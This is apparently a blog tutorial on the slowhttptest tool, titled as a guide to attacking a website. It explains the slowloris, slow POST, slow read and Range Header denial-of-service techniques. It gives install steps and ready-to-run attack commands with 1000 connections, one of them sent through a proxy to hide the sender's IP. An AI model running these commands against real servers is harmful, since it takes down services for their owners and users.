Home / DOS / Attack a website using slowhttptest from Linux and Mac

Attack a website using slowhttptest from Linux and Mac

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin – a Unix-like environment and command-line interface for Microsoft Windows.

It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.

Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.

Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly.

 

slowhttptest logo - blackMORE Ops -3

 

 

[toc+]

 

Installation

Installation for Kali Linux users

For Kali Linux users, install via apt-get .. (life is good!)

root@kali:~# apt-get install slowhttptest 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)     
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali:~#

 

Install slow httptest - blackMORE Ops -1

 

For other Linux distributions

The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install:

$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

 

Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed.

You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.

Alternatively

 

Mac OS X

Using Homebrew:

brew update && brew install slowhttptest

Linux

Try your favorite package manager, some of them are aware of slowhttptest (Like Kali Linux).

 

Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages

 

Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Same test with graph

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

 

Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Same test with graph

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

 

Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

 

Output

Depends on verbosity level, output can be either as simple as heartbeat message generated every 5 seconds showing status of connections with verbosity level 1, or full traffic dump with verbosity level 4.

-g option would generate both CSV file and interactive HTML based on Google Chart Tools.

Here is a sample screenshot of generated HTML page

HTML Report from SlowHTTPTest

 

that contains graphically represented connections states and server availability intervals, and gives the picture on how particular server behaves under specific load within given time frame.

CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs.

Last message you’ll see is the exit status that hints for possible possible program termination reasons:

“Hit test time limit” program reached the time limit specified with -l argument
“No open connections left” peer closed all connections
“Cannot establish connection” no connections were established during first N seconds of the test, where N is either value of -i argument, or 10, if not specified. This would happen if there is no route to host or remote peer is down
“Connection refused” remote peer doesn’t accept connections (from you only? Use proxy to probe) on specified port
“Cancelled by user” you pressed Ctrl-C or sent SIGINT in some other way
“Unexpected error” should never happen

 

Sample output for a real test

I’ve done this test in a sample server and this is what I’ve seen from both attacking and victim end.

7 comments

  1. Thanks for sharing. I’ve never heard of slowhttptest before.
    I was using apache benchmark tool (ab) for performance testing.

    • Hi Flip,
      Pleasure. It was a random find in Googlecode and I liked the project for it’s potential. You can attack or use it as a benchmarking tool. (The way I see, they are both the same – just different user-intent).
      Yes, I’ve used ab too, but it wasn’t very flexible. Cheers,
      -BMO